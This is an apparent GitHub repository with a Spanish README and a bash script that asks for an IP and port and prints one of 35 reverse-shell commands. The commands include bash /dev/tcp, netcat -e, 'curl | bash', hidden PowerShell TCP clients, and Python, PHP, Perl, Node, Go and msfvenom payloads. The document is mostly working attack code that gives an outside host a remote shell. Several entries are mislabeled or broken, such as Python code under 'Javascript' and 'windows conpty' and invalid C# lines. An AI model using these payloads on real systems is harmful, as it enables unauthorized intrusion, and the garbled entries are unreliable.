├── README.md └── revshell.sh /README.md: -------------------------------------------------------------------------------- 1 | # Generador Automático de Shell Inversa 2 | 3 | Una shell inversa es una técnica en la que la máquina de la víctima inicia la conexión hacia la del atacante para recibir comandos. Suele ser eficaz porque evade los firewalls y filtros de seguridad que inspeccionan el tráfico que ingresa al ordenador, ya que la conexión es saliente; por ese motivo, el filtrado y la monitorización del tráfico de salida son los controles que permiten detectarla y bloquearla. En consecuencia, los atacantes suelen utilizar este tipo de shells y también es recomendable emplearlas en tests de intrusión. 4 | 5 | GIF 6 | 7 | ## Instalación 8 | 9 | Clonamos el repositorio 10 | 11 | ```bash 12 | git clone https://github.com/Yextep/Auto-Reverse-Shell-Generator 13 | ``` 14 | Accedemos a la carpeta 15 | ```bash 16 | cd Auto-Reverse-Shell-Generator 17 | ``` 18 | Ejecutamos 19 | ```bash 20 | bash revshell.sh 21 | ``` 22 | 23 | Por último, seleccionas el tipo de reverse shell que quieras generar, escribes la IP y el puerto, y el script te genera el comando de la shell. 24 | GIF 25 | -------------------------------------------------------------------------------- /revshell.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Función para imprimir las opciones de Reverse Shell disponibles 4 | function opciones { 5 | echo "Opciones de Reverse Shell disponibles:" 6 | echo "1. Bash" 7 | echo "2. Netcat" 8 | echo "3. nc mkfifo" 9 | echo "4. nc -e" 10 | echo "5. nc.exe -e" 11 | echo "6. ncat -e" 12 | echo "7. curl" 13 | echo "8. rustcat" 14 | echo "9. c" 15 | echo "10. c windows" 16 | echo "11. c# tcp client" 17 | echo "12. c# bash -i" 18 | echo "13. perl" 19 | echo "14. php" 20 | echo "15. php cmd" 21 | echo "16. php system" 22 | echo "17. windows conpty" 23 | echo "18. Powershell" 24 | echo "19. Powershell (TLS)" 25 | echo "20. Powershell (base64)" 26 | echo "21. Python" 27 | echo "22. Ruby" 28 | echo "23. socat" 29 | echo "24. socat (TTY)" 30 | echo "25. Crystal" 31 | echo "26. sqlite3 nc mkfifo" 32 | echo "27. 
node.js" 33 | echo "28. Java" 34 | echo "29. Java Web" 35 | echo "30. Javascript" 36 | echo "31. Groovy" 37 | echo "32. Telnet" 38 | echo "33. Zsh" 39 | echo "34. Lua" 40 | echo "35. Golang" 41 | } 42 | 43 | # Imprimir las opciones de Reverse Shell disponibles 44 | opciones 45 | 46 | # Leer la opción seleccionada por el usuario 47 | read -p "Seleccione el número de la opción de Reverse Shell que desea generar: " opcion 48 | 49 | # Leer la dirección IP 50 | read -p "Ingrese la dirección IP: " ip 51 | 52 | # Leer el puerto 53 | read -p "Ingrese el puerto: " puerto 54 | 55 | # Generar el comando de Reverse Shell correspondiente 56 | case $opcion in 57 | 1) echo "bash -i >& /dev/tcp/$ip/$puerto 0>&1";; 58 | 2) echo "nc -e /bin/sh $ip $puerto";; 59 | 3) echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $puerto >/tmp/f";; 60 | 4) echo "nc $ip $puerto -e /bin/sh";; 61 | 5) echo "nc.exe -e cmd.exe $ip $puerto";; 62 | 6) echo "ncat $ip $puerto -e /bin/sh";; 63 | 7) echo "curl $ip:$puerto | /bin/bash";; 64 | 8) echo "rustcat $ip $puerto --exec /bin/sh";; 65 | 9) echo "rm -f /tmp/p; mknod /tmp/p p && nc $ip $puerto 0/tmp/p";; 66 | 10) echo "nc.exe -e cmd.exe $ip $puerto";; 67 | 11) echo "csharp -e cmd=System.Net.Sockets.TcpClient(\"$ip\",$puerto);";; 68 | 12) echo "csharp -e cmd=System.Diagnostics.Process.Start(\"/bin/bash\",\"-c\",\"$ip $puerto\");";; 69 | 13) echo "perl -e 'use Socket;$i=\"$ip\";$p=$puerto;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'";; 70 | 14) echo "php -r '\$sock=fsockopen(\"$ip\",$puerto);exec(\"/bin/sh -i <&3 >&3 2>&3\");'";; 71 | 15) echo "php -r '\$sock=fsockopen(\"$ip\",$puerto);shell_exec(\"/bin/bash -i <&3 >&3 2>&3\");'";; 72 | 16) echo "php -r '\$sock=fsockopen(\"$ip\",$puerto);system(\"/bin/bash -i <&3 >&3 2>&3\");'";; 73 | 17) echo "python -c 'import pty;pty.spawn(\"/bin/bash\")'";; 74 | 18) 
echo "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"$ip\",$puerto);\$stream=(New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TCPClient(\"$ip\",$puerto)).GetStream()));[byte[]]\$bytes=0..65535|%{0};while((\$i=\$stream.Read(\$bytes,0,\$bytes.Length)) -ne 0){;\$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i);\$sendback=(iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte=[text.encoding]::ASCII.GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};";; 75 | 19) echo "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"$ip\",$puerto);\$stream=(New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TCPClient(\"$ip\",$puerto)).GetStream()));[byte[]]\$bytes=0..65535|%{0};while((\$i=\$stream.Read(\$bytes,0,\$bytes.Length)) -ne 0){;\$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i);\$sendback=(iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte=[text.encoding]::ASCII.GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};";; 76 | 20) echo "powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand 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";; 77 | 21) echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$puerto));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'";; 78 | 22) echo "ruby -rsocket -e'f=TCPSocket.open(\"$ip\",$puerto).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'";; 79 | 23) echo "socat tcp-connect:$ip $puerto exec:/bin/sh,pty,stderr,setsid,sigint,sane";; 80 | 24) echo "socat file:`tty`,raw,echo=0 tcp-connect:$ip $puerto";; 81 | 25) echo "crystal tcp.cr $ip $puerto";; 82 | 26) echo "rm 
-f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $puerto >/tmp/f";; 83 | 27) echo "nodejs -e 'const net = require(\"net\"), cp = require(\"child_process\"), sh = cp.spawn(\"/bin/sh\", []);const client = new net.Socket();client.connect($puerto, \"$ip\", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;";; 84 | 28) echo "r = Runtime.getRuntime();p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/$ip/$puerto;cat <&5 | while read line; do \$line 2>&5 >&5; done\"] as String[]);p.waitFor();";; 85 | 29) echo "msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ip LPORT=$puerto -f raw > shell.jsp";; 86 | 30) echo "echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$puerto));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' > shell.js && node shell.js";; 87 | 31) echo "echo 'String host=\"$ip\";int port=$puerto;String cmd=\"/bin/bash\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};s.close();p.destroy();' > shell.groovy && groovy shell.groovy";; 88 | 32) echo "telnet $ip $puerto | /bin/bash | telnet $ip $puerto";; 89 | 33) echo "zsh -c 'zmodload zsh/net/tcp && ztcp $ip $puerto && zsh >&\$REPLY 2>&\$REPLY 0>&\$REPLY'";; 90 | 34) echo "lua -e 'require(\"socket\");require(\"os\");t=socket.tcp();t:connect(\"$ip\",\"$puerto\");os.execute(\"/bin/sh -i <&3 >&3 2>&3\");'";; 91 | 35) echo "echo 'package main;import\"os/exec\";import\"net\";func 
main(){c,_:=net.Dial(\"tcp\",\"$ip:$puerto\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}' > shell.go && go run shell.go";; 92 | *) echo "Opción no válida";; 93 | esac 94 | --------------------------------------------------------------------------------